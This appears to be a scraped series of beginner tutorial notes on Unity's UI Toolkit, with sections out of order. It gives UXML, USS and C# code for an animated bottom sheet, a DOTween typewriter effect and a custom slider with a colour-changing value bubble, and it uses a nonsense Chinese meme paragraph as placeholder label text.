    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
}

.button-blue:hover {
    scale: 1.1 1.1;
}

.text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
}

.textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
}

JavaScript has jQuery; Unity has UQuery!

using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UIElements;

public class UIController : MonoBehaviour
{
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;

    // Start is called before the first frame update
    void Start()
    {
        var root = GetComponent<UIDocument>().rootVisualElement;
        _bottomContainer = root.Q<VisualElement>("Container_Bottom");
        _openButton = root.Q<Button>("Button_Open");
        _closeButton = root.Q<Button>("Button_Close");

        _bottomSheet = root.Q<VisualElement>("BottomSheet");
        _scrim = root.Q<VisualElement>("Scrim");

        _bottomContainer.style.display = DisplayStyle.None;

        _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
        _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
        _bottomContainer.style.display = DisplayStyle.Flex;

        _bottomSheet.AddToClassList("bottomsheet--up");
        _scrim.AddToClassList("scrim--fadein");
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
        _bottomContainer.style.display = DisplayStyle.None;

        _bottomSheet.RemoveFromClassList("bottomsheet--up");
        _scrim.RemoveFromClassList("scrim--fadein");
    }

    // Update is called once per frame
    void Update()
    {

    }
}

    png

Bind UIController.cs on the UIDocument and hit Play! One problem remains: no animation plays when the menu closes.

    Unity UI Toolkit Beginner’s Guide 3: Scripting Animation

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" class="image--boy image--boy--inair" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" class="scrim" />
    <ui:VisualElement name="BottomSheet" class="bottomsheet">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement name="image_Girl" class="image--girl image--girl--up" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" name="Message" class="textparagraph" style="margin-top: 80px;" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

.button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
}

.button-blue:hover {
    scale: 1.1 1.1;
}

.text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
}

.textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
}

.bottomsheet {
    width: 100%;
    height: 50%;
    position: relative;
    background-color: rgba(255, 255, 255, 255);
    align-items: center;
    padding-left: 40px;
    padding-right: 40px;
    padding-top: 40px;
    padding-bottom: 40px;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-bounce;
    translate: 0 100%;
}

.bottomsheet--up {
    translate: 0 0;
}

.scrim {
    height: 50%;
    background-color: rgba(0, 0, 0, 0.5);
    transition-property: opacity;
    transition-duration: 0.5s;
    opacity: 0;
}

.scrim--fadein {
    opacity: 1;
}

.image--boy {
    background-color: rgba(255, 255, 255, 0);
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&guid=6a43c56327b2ded46a942d159deac62a&type=3#Hyperspace - Floating');
    height: 600px;
    width: 300px;
    transition-property: translate;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-out-sine;
    translate: 0 0;
}

.image--boy--inair {
    translate: -500px -400px;
}

.image--girl {
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&guid=c9c505e591b63904a901936e91e0ae2a&type=3#Hyperspace - Projector');
    width: 438px;
    height: 400px;
    translate: 0 60px;
    transition-property: translate;
    transition-timing-function: ease-out-sine;
    transition-duration: 0.5s;
}

.image--girl--up {
    translate: 0 0;
}

using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UIElements;
using DG.Tweening;

public class UIController : MonoBehaviour
{
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    private VisualElement _boy;
    private VisualElement _girl;
    private Label _message;

    // Start is called before the first frame update
    void Start()
    {
        var root = GetComponent<UIDocument>().rootVisualElement;
        _bottomContainer = root.Q<VisualElement>("Container_Bottom");
        _openButton = root.Q<Button>("Button_Open");
        _closeButton = root.Q<Button>("Button_Close");

        _bottomSheet = root.Q<VisualElement>("BottomSheet");
        _scrim = root.Q<VisualElement>("Scrim");

        _boy = root.Q<VisualElement>("image_Boy");
        _girl = root.Q<VisualElement>("image_Girl");

        _message = root.Q<Label>("Message");

        _bottomContainer.style.display = DisplayStyle.None;

        _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
        _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);

        Invoke("AnimateBoy", 1f);

        _bottomSheet.RegisterCallback<TransitionEndEvent>(OnBottomSheetDown);
    }

    private void AnimateBoy()
    {
        _boy.RemoveFromClassList("image--boy--inair");
    }

    private void AnimateGirl()
    {
        _girl.ToggleInClassList("image--girl--up");
        _girl.RegisterCallback<TransitionEndEvent>(
            evt => _girl.ToggleInClassList("image--girl--up")
        );

        _message.text = string.Empty;
        string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
        DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
        _bottomContainer.style.display = DisplayStyle.Flex;

        _bottomSheet.AddToClassList("bottomsheet--up");
        _scrim.AddToClassList("scrim--fadein");

        AnimateGirl();
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
        _bottomSheet.RemoveFromClassList("bottomsheet--up");
        _scrim.RemoveFromClassList("scrim--fadein");
    }

    private void OnBottomSheetDown(TransitionEndEvent evt)
    {
        if (!_bottomSheet.ClassListContains("bottomsheet--up"))
        {
            _bottomContainer.style.display = DisplayStyle.None;
        }
    }

    // Update is called once per frame
    void Update()
    {
        Debug.Log(_girl.ClassListContains("image--girl--down"));
    }
}

The key pieces:

Invoke("AnimateBoy", 1f);

Delaying the call to AnimateBoy makes the entry animation play correctly.

_girl.ToggleInClassList("image--girl--up");
_girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
);

This yields a looping animation.

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);

The typewriter effect is implemented with the DOTween plugin.

    Unity UI Toolkit Beginner’s Guide 4: Customizing Slider 1

    png

Make a texture for the slider.

    png

Create a Slider, set its Background to the slider Sprite, and open the Sprite Editor to adjust the texture's Border.

    png

The slider's internals cannot be edited directly; the styles can only be overridden with USS selectors.

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;" />
    </ui:UXML>

#MySlider Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    background-color: rgb(222, 255, 184);
    display: none;
}

#MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
}

#MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
}

#MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
}

.bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
}

.newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgba(0, 140, 255, 255);
}

The align-self: flex-end under .bar does not exist yet in my version of Unity; hilariously, hand-editing the USS file still works.

using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UIElements;

public class CustomSlider : MonoBehaviour
{
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;

    // Start is called before the first frame update
    void Start()
    {
        m_Root = GetComponent<UIDocument>().rootVisualElement;
        m_Slider = m_Root.Q<Slider>("MySlider");
        m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

        AddElements();

        m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

        m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);
    }

    void AddElements()
    {
        m_Bar = new VisualElement();
        m_Dragger.Add(m_Bar);
        m_Bar.name = "Bar";
        m_Bar.AddToClassList("bar");

        m_NewDragger = new VisualElement();
        m_Slider.Add(m_NewDragger);
        m_NewDragger.name = "NewDragger";
        m_NewDragger.AddToClassList("newdragger");
        m_NewDragger.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> evt)
    {
        Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
        Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
        m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
        Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
        Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
        m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    // Update is called once per frame
    void Update()
    {

    }
}

At the end, the author remarks that with UGUI this would have taken him at most five minutes. Hilarious; not exactly user-friendly.

    Unity UI Toolkit Beginner’s Guide 5: Customizing Slider 2

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; translate: 0 200px;" />
    <ui:VisualElement class="bubble" style="display: none; left: 0;">
    <ui:Label text="24" display-tooltip-when-elided="true" class="bubble_label" style="display: flex;" />
    </ui:VisualElement>
    </ui:UXML>
    #MySlider > Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    border-top-left-radius: 10px;
    border-bottom-left-radius: 10px;
    border-top-right-radius: 10px;
    border-bottom-right-radius: 10px;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgb(0, 140, 255);
    }

    .bubble {
    position: absolute;
    background-image: url('project://database/Assets/Images/Bubble.png?fileID=2800000&guid=b836b02351db7664d82b839e800143df&type=3#Bubble');
    width: 110px;
    height: 140px;
    opacity: 1;
    transition-property: scale, opacity;
    transition-duration: 1s, 1s;
    transition-timing-function: ease-out-elastic, ease-out-elastic;
    transform-origin: bottom;
    }

    .bubble_label {
    width: 100%;
    height: 75%;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -unity-text-align: middle-center;
    font-size: 40px;
    -unity-font-style: bold;
    color: rgb(255, 255, 255);
    display: flex;
    }

    .bubble--hidden {
    opacity: 0;
    scale: 0.5 0.5;
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    private VisualElement m_Bubble;
    private Label m_BubbleLabel;

    public Color color_A;
    public Color color_B;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);

    m_Slider.RegisterCallback<PointerCaptureEvent>(_=>
    {
    m_Bubble.RemoveFromClassList("bubble--hidden");
    });

    m_Slider.RegisterCallback<PointerCaptureOutEvent>(_ =>
    {
    m_Bubble.AddToClassList("bubble--hidden");
    });
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;

    m_Bubble = new VisualElement();
    m_Slider.Add(m_Bubble);
    m_Bubble.name = "Bubble";
    m_Bubble.AddToClassList("bubble");
    m_Bubble.AddToClassList("bubble--hidden");
    m_Bubble.pickingMode = PickingMode.Ignore;

    m_BubbleLabel = new Label();
    m_Bubble.Add(m_BubbleLabel);
    m_BubbleLabel.name = "Bubble_Label";
    m_BubbleLabel.AddToClassList("bubble_label");
    m_BubbleLabel.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> value)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;

    float v = Mathf.Round(value.newValue);

    m_BubbleLabel.text = v.ToString();

    m_Bar.style.backgroundColor = Color.Lerp(color_A, color_B, v / 100f);
    m_Bubble.style.unityBackgroundImageTintColor = Color.Lerp(color_A, color_B, v / 100f);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    Unity UI Toolkit Beginner’s Guide 6: Timeline Animation

A plugin that adds Timeline support to UI Toolkit.

    ]]>
+ Main Text

    Unity UI Toolkit Beginner’s Guide 1: Layout & Style

IMGUI → UGUI → UI Toolkit

UI Toolkit is Unity's new-generation UI system!

        Style   Structure & Layout   Interactions
Web     CSS     HTML                 JavaScript
Unity   USS     UXML                 C#

UI Toolkit borrows ideas from web front-end development, introducing two concepts: USS and UXML.


In the Project window, create a UI Document to get a UXML file.


In the Hierarchy, create a UI Document and hook up its Panel Settings and Source Asset.


Open the UXML file; the editor looks a bit like Dreamweaver? Set the Unity Default Runtime Theme, Match Game View, and the Canvas Background.


After a bit of fiddling: a VisualElement is the analogue of a web <div>, except that the only supported display mode is flex; a Label is the analogue of a <p>.
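The same analogy carries over to C#. A minimal sketch of my own (assuming a UIDocument component on the same GameObject):

using UnityEngine;
using UnityEngine.UIElements;

public class DivAndP : MonoBehaviour
{
    void Start()
    {
        var root = GetComponent<UIDocument>().rootVisualElement;

        var container = new VisualElement();               // plays the role of <div>
        container.style.flexDirection = FlexDirection.Row; // layout is always flexbox
        root.Add(container);

        var label = new Label("Hello UI Toolkit");         // plays the role of <p>
        container.Add(label);
    }
}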


As for the font, you can use the Font Asset Creator. It looks really powerful! I haven't fully figured it out yet.


Everything so far has been inline styles, which isn't great. Create a StyleSheet to hold proper style rules, then bind them in each element's Style Class List.

The final UXML file:

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement style="background-color: rgba(255, 0, 0, 0); width: auto; height: 100%; position: relative; align-items: flex-start;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgba(255, 255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 20px; padding-top: 20px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&#10;&#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 24px; margin-left: 20px; margin-right: 20px; margin-top: 20px; margin-bottom: 20px; padding-left: 60px; padding-right: 60px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

The USS file:

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgba(255, 255, 255, 255);
    background-color: rgba(0, 102, 255, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    Unity UI Toolkit Beginner’s Guide 2: Animating Interaction


UI Toolkit supports both Relative and Absolute positioning.


With Flex, elements shrink when the container is too small.
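Both behaviors can also be set from C#; a small sketch of my own (class and sizes are hypothetical):

using UnityEngine;
using UnityEngine.UIElements;

public class PositioningDemo : MonoBehaviour
{
    void Start()
    {
        var root = GetComponent<UIDocument>().rootVisualElement;

        var box = new VisualElement();
        box.style.width = 200;
        box.style.height = 200;

        // Absolute: taken out of the flex flow, placed by left/top offsets.
        box.style.position = Position.Absolute;
        box.style.left = 50;
        box.style.top = 50;

        // Under the default Position.Relative, this line would instead keep
        // the element from shrinking when the container is too small:
        box.style.flexShrink = 0;

        root.Add(box);
    }
}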


Build a UI like this one, and switch between views by adding classes to elements.

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
